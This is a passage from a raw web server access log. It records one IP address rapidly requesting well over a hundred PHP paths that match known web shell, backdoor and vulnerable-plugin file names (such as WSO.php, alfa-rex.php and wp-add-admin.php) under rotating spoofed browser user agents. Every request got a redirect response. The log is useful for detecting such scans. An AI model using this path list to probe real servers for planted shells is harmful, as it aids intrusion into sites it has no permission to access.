(KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:53 -0500] "GET /ava.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:54 -0500] "GET /uplozvb.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" 194.5.82.85 - - [20/Dec/2025:15:24:54 -0500] "GET /wp-content/themes/about.php7 HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 194.5.82.85 - - [20/Dec/2025:15:24:54 -0500] "GET /wp-content/themes/aahana/json.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0" 194.5.82.85 - - [20/Dec/2025:15:24:54 -0500] "GET /wp-admin/images/chosen.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:24:55 -0500] "GET /22.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:55 -0500] "GET /wp-admin/admin-ajax.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:56 -0500] "GET /wp-admin/x.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:57 -0500] "GET /buy.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:57 -0500] "GET /wp-pano.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:58 -0500] "GET /an.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0" 194.5.82.85 - - [20/Dec/2025:15:24:58 -0500] "GET /wp-content/edit.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:59 -0500] "GET /.well-known/pki-validation/chosen.php HTTP/1.1" 302 771 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:59 -0500] "GET /lock360.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:59 -0500] "GET /wp-content/plugins/Cache/Cache.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 194.5.82.85 - - [20/Dec/2025:15:24:59 -0500] "GET /wp-includes/block-supports/custom-classname.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko" 194.5.82.85 - - [20/Dec/2025:15:25:00 -0500] "GET /db.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:00 -0500] "GET /.ll/ss.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:24:57 -0500] "GET /classwithtostring.php/rbzccnnp.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0" 194.5.82.85 - - [20/Dec/2025:15:24:57 -0500] "GET /lufix.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" 194.5.82.85 - - [20/Dec/2025:15:24:58 -0500] "GET /about/function.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0" 194.5.82.85 - - [20/Dec/2025:15:24:58 -0500] "GET /klbnm.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:24:58 -0500] "GET /wp-content/themes/pridmag/install.php?u HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:59 -0500] "GET /sim.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:00 -0500] "GET /.well-known/acme-challenge/cloud.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 194.5.82.85 - - [20/Dec/2025:15:25:00 -0500] "GET /css/install.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:00 -0500] "GET /alfa-rex.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 194.5.82.85 - - [20/Dec/2025:15:25:01 -0500] "GET /wp-add-admin.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:25:02 -0500] "GET /22.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" 194.5.82.85 - - [20/Dec/2025:15:25:02 -0500] "GET /wp-includes/IXR/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0" 194.5.82.85 - - [20/Dec/2025:15:25:02 -0500] "GET /wp-content/themes/sketch/404.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:03 -0500] "GET /wp-admin/css/wp-conflg.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0" 194.5.82.85 - - [20/Dec/2025:15:25:03 -0500] "GET /wp-content/uploads/2023/05/404.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:03 -0500] "GET /wp-content/plugins/wp-apxupx.php?apx=upx HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0" 194.5.82.85 - - [20/Dec/2025:15:25:03 -0500] "GET /mail.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:25:04 -0500] "GET /.tmb/mariju.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" 13.84.156.6 - - [20/Dec/2025:15:25:04 -0500] "HEAD /backup HTTP/1.1" 301 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:04 -0500] "GET /xtride.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:01 -0500] "GET /wp-includes/block-patterns/autoload_classmap.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:25:01 -0500] "GET /wp-admin/includes/themes.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0" 194.5.82.85 - - [20/Dec/2025:15:25:01 -0500] "GET /wp-includes/SimplePie/db_model.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:02 -0500] "GET /v.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:02 -0500] "GET /k.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0" 194.5.82.85 - - [20/Dec/2025:15:25:03 -0500] "GET /tyasd.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:25:04 -0500] "GET /wp-content/themes/404.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:04 -0500] "GET /wp-includes/widgets/autoload_classmap.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:25:04 -0500] "GET /ioxi002.PhP7/wp-admin/images/Mhbgf.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:05 -0500] "GET /wp-content/uploads/admin.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:25:05 -0500] "GET /wp-includes/Requests/Text/admin.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:06 -0500] "GET /users.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:25:07 -0500] "GET /koko.PhP7 HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:25:08 -0500] "GET /text.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 194.5.82.85 - - [20/Dec/2025:15:25:08 -0500] "GET /flower.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:09 -0500] "GET /wp-admin/fmadmin.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:09 -0500] "GET /ok.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 194.5.82.85 - - [20/Dec/2025:15:25:09 -0500] "GET /wp-includes/customize/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:09 -0500] "GET /classsmtps.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:10 -0500] "GET /wp-includes/fonts/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:05 -0500] "GET /wp-admin/js/widgets/admin.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:05 -0500] "GET /WSO.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:05 -0500] "GET /user.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:06 -0500] "GET /wp-includes/js/tinymce/skins/wordpress/images/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:06 -0500] "GET /wp-content/cong.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 194.5.82.85 - - [20/Dec/2025:15:25:06 -0500] "GET /edit.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 194.5.82.85 - - [20/Dec/2025:15:25:06 -0500] "GET /t.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:25:07 -0500] "GET /style.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:25:07 -0500] "GET /link.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:07 -0500] "GET /ioxi2.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko" 194.5.82.85 - - [20/Dec/2025:15:25:07 -0500] "GET /wp-includes/Text/wp-conflg.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:08 -0500] "GET /rss.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" 194.5.82.85 - - [20/Dec/2025:15:25:08 -0500] "GET /wp-admin/includes/wp-conflg.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0" 194.5.82.85 - - [20/Dec/2025:15:25:08 -0500] "GET /wp-includes/Requests/src/Hooks.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:25:09 -0500] "GET /wp-admin/wp-conflg.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:25:10 -0500] "GET /backup.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:10 -0500] "GET /wp-admin/includes/wp-conflg.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:10 -0500] "GET /wp-admin/autoload_classmap.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:10 -0500] "GET /asgoxtyad2mjhno6ds4ikvhdCakc128.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:11 -0500] "GET /.well-known/acme-challenge/xmrlpc.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:25:11 -0500] "GET /gtc.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:25:12 -0500] "GET /wp-content/plugins/wp-file-manager/file_folder_manager.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:25:13 -0500] "GET /css.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:13 -0500] "GET /wp-includes/css/db_model.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:13 -0500] "GET /av.php%20s HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:25:13 -0500] "GET /wp-content/plugins/sid/sidwso.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:14 -0500] "GET /wp-head.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 194.5.82.85 - - [20/Dec/2025:15:25:14 -0500] "GET /mm.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:14 -0500] "GET /wp-content/plugins/mainhosting/asasx.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:15 -0500] "GET /wp-admin/images/Mhbgf.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 194.5.82.85 - - [20/Dec/2025:15:25:15 -0500] "GET /mailer.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:16 -0500] "GET /aaa.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:16 -0500] "GET /filemanager.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:17 -0500] "GET /MARIJUANA.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:17 -0500] "GET /mln.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:25:17 -0500] "GET /vx.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 194.5.82.85 - - [20/Dec/2025:15:25:18 -0500] "GET /ioxi01.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:18 -0500] "GET /ms.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 194.5.82.85 - - [20/Dec/2025:15:25:18 -0500] "GET /u.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" 194.5.82.85 - - [20/Dec/2025:15:25:18 -0500] "GET /wp-content/themes/digital-download/new.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:11 -0500] "GET /wp-includes/PHPMailer/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:11 -0500] "GET /404.php/wp-admin/images/Mhbgf.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:25:11 -0500] "GET /wp-content/themes/cay-van-phong/filemanager.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:12 -0500] "GET /index/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:12 -0500] "GET /s.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:25:12 -0500] "GET /wp-content/plugins/so-pinyin-slugs/inc/main_json.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:12 -0500] "GET /help.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:13 -0500] "GET /vendor/phpunit/phpunit/src/Util/PHP/as.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:14 -0500] "GET /footers.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:14 -0500] "GET /wp-admin/dropdown.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 194.5.82.85 - - [20/Dec/2025:15:25:15 -0500] "GET /wp-includes/certificates/plugins.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:15 -0500] "GET /wp-content/plugins/phpadmin/acp.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:15 -0500] "GET /wp-admin/function.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:16 -0500] "GET /.well-known/.qiodetme.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:16 -0500] "GET /wp-content/uploads/de_fb_uploads/b.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 